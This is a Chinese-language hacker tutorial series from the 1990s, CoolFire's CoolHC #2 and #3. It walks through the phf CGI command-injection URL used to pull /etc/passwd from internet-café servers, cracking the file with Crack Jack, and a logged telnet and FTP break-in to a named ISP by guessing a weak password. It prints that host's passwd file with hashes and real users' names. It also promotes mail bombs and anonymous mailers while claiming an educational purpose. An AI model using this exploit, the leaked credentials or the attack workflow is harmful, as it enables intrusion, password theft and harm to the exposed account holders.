当作Password 的人最好的方式,但是也曾经好运的找到别人的密码, 真不晓得"甲"是不是暗恋"乙"才用"乙"的ID 作为密码的???你可以很简单的使用Qbasic 来制作"序数" 密码, 或日期密码, 底下简单的作一个0101 (一月一日) 到1231 的密码档出来:------------Cut Here MakeDate.BAS -------------------Open "Dates" for output as #1for I=1 to 12for J=1 to 31I1$=rtrim$(ltrim$str$(I)))J1$=rtrim$(ltrim$str$(J)))if len(I1$)=1 then I1$="0"+I1$if len(J1$)=1 then J1$="0"+J1$Out$=I1$Content$J1$print #1,Out$next Inext Jclose------------ Cut Here End MakeDate.BAS ----------------这支小程式将会写一个"DATES" 的档案, 里面就是你要的字典, 当然啦,这只是包含月跟日!!如果你要猜的密码是含年份的, 你可能要再增加一些程式码, 再Run 一次试试看了,不过这是一个好的开始不是吗??**如何保护自己的密码谈了这麽多的密码猜法, 当然要谈一下如何保护自己的密码不被破解,请遵守以下的原则: [1]不用生日作为密码(太容易猜了啦) [2]不用序数作为密码(除非你的序数无限大) [3]不用身份证字号作为密码(LetMeIn! 里有猜身份证字号的功能耶)[4]不用在字典中查得到的字作为密码.那麽依照上面的几点说法, 甚麽样子的密码最不容易猜, 自己也最好记呢?? 答案是:用一句有意义的话来作为自己的密码, 例如: NoOneCanCrackIt 就是一个很难猜的密码类型, 基於这个密码猜法的原则, 你的密码是不是要作些更新, 或是大小写要作一些对调?? 如果你的密码是coolfire,建议你最好能改成CoolFire 或coolfires (加复数"s"),这样被猜中的机率就小了很多. 如果你是一个Hacker, 你的密码也被人猜中的话... 那...#%%^^^&@**正式的话题这次的话题当然还是Crack, 相信许多人已经看过CoolHC#1 了,当然眼尖的人可能也已经D/LSystem Holes 试过了, 你有成功的例子吗?? 如果没有, 这份CoolHC#2可能就是你的强心针,因为这次谈的正是System Holes #1 成功的案例.Step 1. 连线到"蕃薯藤" 找"网路咖啡" 找到好多家网路咖啡的WWW 网址, 一一连上去试试看在System Holes #1 中的方法可不可行.Step 2. 若可行则会传回/etc/passwd 资讯, 存档後迅速Logout, 使用Crack Jack解读!![[实例探讨]]System Holes #1 中所介绍的WWW 入侵法是这样子的:/cgi-bin/nph-test-cgi?* 後再/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd[1] 用WWW Browser 连到[2] Location 输入--> "/cgi-bin/nph-test-cgi?*"[3] 接著如果出来一份像Report 的画面的话, 接著输入/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd[4] 发生了甚麽事?? etc/passwd 在你的浏览器中"显示" 出来了!! 快点Save 吧!!这个方法所用的是系统"检索" 的漏洞, 不提供这个功能,或是伺服器检索类型不同的机器则不会接受这样的指令, 当然也就逃过我们这次的模拟演练啦!! 但是.... 相信我,你一定会找到一家脱线的网路咖啡, 并没有像我们一样每天阅读Mail List 的信,对系统安全一点研究也没有的人不在少数. 就是这样的一个Net Coffee Shop... 呵.... 快来试试吧!!当CoolFire 抓到/etc/passwd 後, 立刻存档, 也马上断线, 并且拿出UltraEdit 来瞧一下使用者的资讯, 当然这个小passwd 对Crack Jack 来说, 实在是不够看,没几分钟就在我的486 机器上显示出来几个以UserName 作为Password 的资讯(归功於PaSs2DiC 及CrackJack 的功劳)不过当我试著找寻root 的密码时, 一想到我那将近20 万字的字典档,就想到可能花费的时间一定相当的惊人, 於是就以Jack 的Option 设定只寻找root 那一行, ...(过了良久)... 果不然又是一个笨root. 用了"非常" 容易猜的密码... <--- This is JackAss... 呵!! GotIt!如果你所使用的机器速度不是顶快, 你最好能够到快一点的机器上使用Crack Jack,不然你也可以将字典档切割成几个小档案, 然後再分别在几台机器上跑, 我目前使用的配备是486DX4-13032MB RAM, 3.2GB HDD, 近20 万字的字典档, 如果在分析较大的passwd档时我会将字典档切割为四至五个小档(看有多少台机器可跑),然後在周末下班前在公司的几台机器上分别执行CrackJack, 等到礼拜一上班时就等著接收成果了! 当然如果你只有一台机器, passwd 档又很大的话,由於Crack Jack 无法於Windoz 95 下使用, 你可能只能牺升时间或机器来跑了! 再没有办法的话, 亦可使用单机多工, 多开几个DOS Box 来跑Brute, 也许也是一个可行的办法!**後语有许多人在使用Crack Jack 的时候有许多问题, 不过看了CoolHC#1 应该都解决了吧?? 最近大家问的比较多的是UpYours 3.0, 虽然已经改进了Install 的问题,不过大家的问题还是都出在Winsck.ocx 上面, 有人说装了MSICP Beta 会好?? 但也有实例装了也还不能Run 的,在此建议大家不要再玩MailBomb 了, 虽然我喜欢收集这种东西, 但还是少乱炸为妙,已经证实有许多常用的MailBomb 没有办法Fake IP 了!! 所以... 如果UpYours 3.0装不起来的人就试试KaBoom!V3.0 吧! 虽然没有办法Fake IP (选错Mail Server 的话), 但是也是一个不错的AnonyMailer如果要发匿名信, 现在首页上有可以帮你发信的Mailer, 会安全一点.如果你仍旧对UpYours 3.0 不死心, 就试试ResSvr32.exe (Under Windows/systemdirectory),看看能不能将WinSck.ocx 装上了... 记得先UnReg 再Reg...在此建议大家可以多订阅一些"系统安全" 讨论的Mail List或多参考一些已经被找出来的系统漏洞, 因为有些人对这些方面并不是很重视, 所以这些资讯也就显得格外的重要了,如果能够多参考一些资讯, 在你入侵的时候会有很大的帮助, 当然, 如果你能作出一份列表出来,放在手边参考的话, 就可以快速的; 安全的入侵了!! 下一次所谈的是SendMail 的Bug 实例,在这中间当然照往例会先出一份System Holes #2 来作为资料. 如果有兴趣的人在SH#2 出来的时候可以先研究看看. 下次见! Merry X'Mas..... & Happy New Year.......------上次讲的Home Page 建置案还没搞完, 没有充实一下Home Page 实在是对不起大家,所以利用一点时间写了CoolHC#2, 可能报告又交不出来了!! 老话,如果你有兴趣写其它程式的中文说明, 请完成後寄一份给我, 我将它放在Home Page 上面让其它人参考,当然你也可以给我你的使用心得, 让别人参考看看也行! 目前准备收集一系列的System Hole List,如果你在其它的站台有看到的, 请把它先Cut 下来, Mail 一份给我!------再次重申, Crack 别人站台之後不要破坏别人站台中的资料, 此篇文章仅作为教育目的,不主张你随便入侵他人主机.... (高-Net 还是除外)... 请勿将这类技术使用於破坏上(又...如果第三次世界大战开打, 你可以任意破坏敌国的电脑网路... 我全力支持),最严重的情况(如果你真的很讨厌该主机的话)... 就将它Shut Down.... 好了! 别太暴力了!CoolFire系列讲座第3讲:如何连接ISP并且对其解码作者:CoolFire [coolfires@] (2001-10-13 08:05:00) CoolHC Volume 3 By CoolFire Author E-Mail: coolfires@这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责!!前几次说到了Net Coffee 店, 还好他们没有提供客户拨接上线的功能, 不然密码或是帐号被人盗用的客户不就糗大了! 但是CoolFire 在这两周的探险中, 为了找一个酷似网路咖啡站台的W3 密码,误入一个号称第一个提供网路拨接的ISP, 且在CoolFire 顺利的抓回/etc/passwd 之後, 使用了自己写的PaSs2DiC + CJack 来解出密码, 没想到不用 1 分钟, 就找出了9 组ID 与Password 相同的密码,勿怪我没有在这里提醒大家, 还好我没有找到root password, 不然可能该系统就此停摆, 不可再见天日也! (当然我不可能这么作啦!).看看最近兴起的网路咖啡及各大网站的系统安全设施, 再加上CoolFire 最近开会的时候遇到的情况, 不难发现我们的国家正往高科技的领域快步迈进, 但是这些系统的安全性若不加强, 可能到时候人家只要一台电脑再加上一台数据机就可以让整个国家的金融及工商业崩溃! 大家要小心呀!ISP 是一般User 拨接的源头, 技术上理应比较强, 但还是轻易让人入侵, 且又没有教导User 正确的网路使用观念(Password 的设定及proxy 的使用等), 实在不敢想像这样的网路发展到几年後会是甚么样子??这一次的说明还是没有谈到新的技巧, 在James 将首页更新後各位应该已经可以从中学到许多东西了, 如果想要学习入侵, 就一定要知道最新的资讯(入侵本国的网路则不用, 反正没人重视网路安全..... 真失望), 在别人还没将Bug 修正之前就抢先一步拿到/etc/passwd, 所以订阅一些网路安全的Mail List 是必要的, 多看一些网安有关的News Group 也是必要的(不仅Hacker 如此, ISP 更要多注意这些资讯!). 日後有空再整里一些Mail List 给大家!!本次主题: 说明如何连接该ISP 并且对其/etc/passwd 解码连接位址: (203.66.169.11)特别说明: 由於本次主题说明重点使用真实的位址及名称, 所以CoolFire 已经Mail 给该网页之维护人员更改密码, 但该网页之ISP 仍为新手之练习好题材! CoolFire Mail 给该网页维护人员之信件内容如下, 如果他还不尽快改掉, 我也没办法了!Mail sent to dhacme@:Subject: 请速更动网页密码From: CoolFire <coolfires@>你的网页作得不错, 但是因为你所设定的密码太容易为骇客所? 入侵, 请於见到此信後速速更改你的网页进入密码, 否则下次若网页遭到篡改, 本人概不负责!!**** 课程开始****请注意: 由於本次所作的课程内容以实作为主, 除了本人IP 有所更改, 一切都使用本人所用之Telnet 软体Log 档收录, 故若道德感不佳者请勿阅读以下之详细破解内容, 否则本人概不负责!(连线到某一主机之後.... 此处的.tw 是假的Domain name).tw> telnet Trying 203.66.169.11...Connected to .Escape character is '^]'.Password: (随便按一下Enter)Login incorrectwww login: coffee (以Hacker 的敏锐判断username=coffee password=coffee)Password:Last login: Thu Jan 9 10:41:52 from .tw欢迎光临....... 以下略! 因涉及该ISP 的名誉, 大家自己去看吧!================================================================= (直接进入核心部份)www:~$ cd /etcwww:/etc$ lsDIR_COLORS hosts.equiv printcapHOSTNAME hosts.lpd profile NETWORKING inet@ protocolsNNTP_INEWS_DOMAIN inetd.conf psdevtabX11@ inittab rc.d/at.deny inittab.gettyps.sample resolv.confbootptab ioctl.save rpccsh.cshrc issue securettycsh.login securetty.olddefault/ klogd.pid sendmail.cfdiphosts ld.so.cache sendmail.stexports ld.so.conf servicesfastboot lilo/ shellsfdprm lilo.conf shutdownpidfs/ localtime skel/fstab magic slip.hostsftp.banner mail.rc slip.loginftp.deny motd snooptabftpaccess motd.bak sudoersftpconversions msgs/ syslog.confftpgroups mtab syslog.pidftpusers mtools termcapgateways named.boot ttysgettydefs networks utmp@group nntpserver vga/host.conf passwd wtmp@hosts passwd.OLD yp.conf.example hosts.allow passwd.oldhosts.deny ppp/(看看我们的目标长得如何???)www:/etc$ cat passwdroot:abcdefghijklmn:0:0:root:/root:/bin/bashbin:*:1:1:bin:/bin:daemon:*:2:2:daemon:/sbin:adm:*:3:4:adm:/var/adm:lp:*:4:7:lp:/var/spool/lpd:sync:*:5:0:sync:/sbin:/bin/syncshutdown:*:6:0:shutdown:/sbin:/sbin/shutdownhalt:*:7:0:halt:/sbin:/sbin/haltmail:*:8:12:mail:/var/spool/mail:news:*:9:13:news:/usr/lib/news:uucp:*:10:14:uucp:/var/spool/uucppublic:operator:*:11:0:operator:/root:/bin/bashgames:*:12:100:games:/usr/games:man:*:13:15:man:/usr/man:postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bashnobody:*:-1:100:nobody:/dev/null:ftp:*:404:1::/home/ftp:/bin/bashguest:*:405:100:guest:/dev/null:/dev/nullshan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bashfax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bashtham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bashccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bashsk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bashservices:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash order:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash corey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bashrichard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bashlilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bashsupport:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bashstonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/cshbear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bashlance:Pf7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh taiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash liheng:6hGixt6Kgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bashcaves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bashsales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bashkingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bashrecycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bashrecycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bashrecycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash recycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bashhxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bashgoodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bashrwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bashcharliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bashslb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bashs6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bashlsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bashlilly:DhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bashnalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bashtoonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bashyahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bashbasic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bashwunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bashkaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash shuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bas hfan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash(CoolFire 注: 因为使用PaSs2DiC 很容易找出ID 与Password 相同的. 故除了Coffee 外, 其它我找到密码的EnCode Password 部份皆改过..... 除非你一个一个试啦~~~ 我没说喔!)www:/etc$ exitlogoutConnection closed by foreign host.(可以走了!! 改用FTP 将/etc/passwd 给抓回来吧!).tw> ftp Connected to .220-220- 欢迎光临....... 以下略! 因涉及该ISP 的名誉, 大家自己去看吧!220-220-220- There are 0 users in FTP Server now.220- 目前已有0 使用者在此Server 上.220- If you have any suggestion, please mail to:220- service@xx.xxxxxxx.xxx.xx.220-220-220-220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.(还是使用刚刚的帐号进入)Name (:YourName): coffee331 Password required for coffee.Password:230 User coffee logged in.Remote system type is UNIX.Using binary mode to transfer files.(直接到达档案放置地点)ftp> cd /etc250 CWD command successful.ftp> ls200 PORT command successful.150 Opening ASCII mode data connection for file list.ttysfdprmgroupissuemotdmtoolsprofilesecurettyshellstermcapskelcsh.cshrccsh.loginlilo。